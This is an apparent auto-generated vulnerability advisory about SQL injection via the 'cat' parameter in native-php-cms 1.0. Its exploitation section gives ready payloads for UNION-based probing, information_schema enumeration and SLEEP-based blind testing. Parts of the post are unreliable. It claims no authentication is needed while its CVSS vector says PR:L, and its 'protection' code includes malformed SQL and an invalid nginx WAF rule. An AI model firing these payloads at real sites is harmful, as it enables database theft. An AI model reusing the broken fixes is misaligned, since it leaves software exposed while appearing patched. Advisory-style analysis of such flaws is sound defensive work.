The CVE-2025-0488 vulnerability in Fanli2012 native-php-cms 1.0 allows remote attackers to execute arbitrary SQL queries via the `cat` parameter in product_list.php. This occurs due to improper sanitization of user-supplied input before concatenation into SQL statements. Attackers can manipulate the `cat` parameter to inject malicious SQL payloads, potentially leading to unauthorized database access, data leakage, or system compromise. The vulnerability is remotely exploitable without authentication, making it critical.
DailyCVE Form:
Platform: Fanli2012 native-php-cms
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/05/2025
What Undercode Say:
Exploitation:
1. Payload Example:
http://target.com/product_list.php?cat=1' UNION SELECT 1,2,3,4,5-- -
2. Database Enumeration:
?cat=1' UNION SELECT 1,table_name,3,4,5 FROM information_schema.tables-- -
3. Blind SQLi Detection:
http://target.com/product_list.php?cat=1' AND SLEEP(5)-- -
Protection:
1. Input Sanitization:
$cat = mysqli_real_escape_string($conn, $_GET['cat']);
2. Prepared Statements:
$stmt = $conn->prepare("SELECT FROM products WHERE cat = ?");
$stmt->bind_param("s", $_GET['cat']);
3. WAF Rules:
location ~ product_list.php {
deny ~ "union|select|sleep|information_schema";
}
Analytics:
- CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L
- Exploitability: Remote, Low Complexity
- Patch Status: No official fix
Detection Commands:
curl -s "http://target.com/product_list.php?cat=1'" | grep "SQL syntax"
Log Analysis:
grep "product_list.php?cat=" /var/log/apache2/access.log | grep -E "union|select|--"
Mitigation Script:
if (preg_match('/[\'"]/', $_GET['cat'])) {
die("Invalid input detected");
}
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
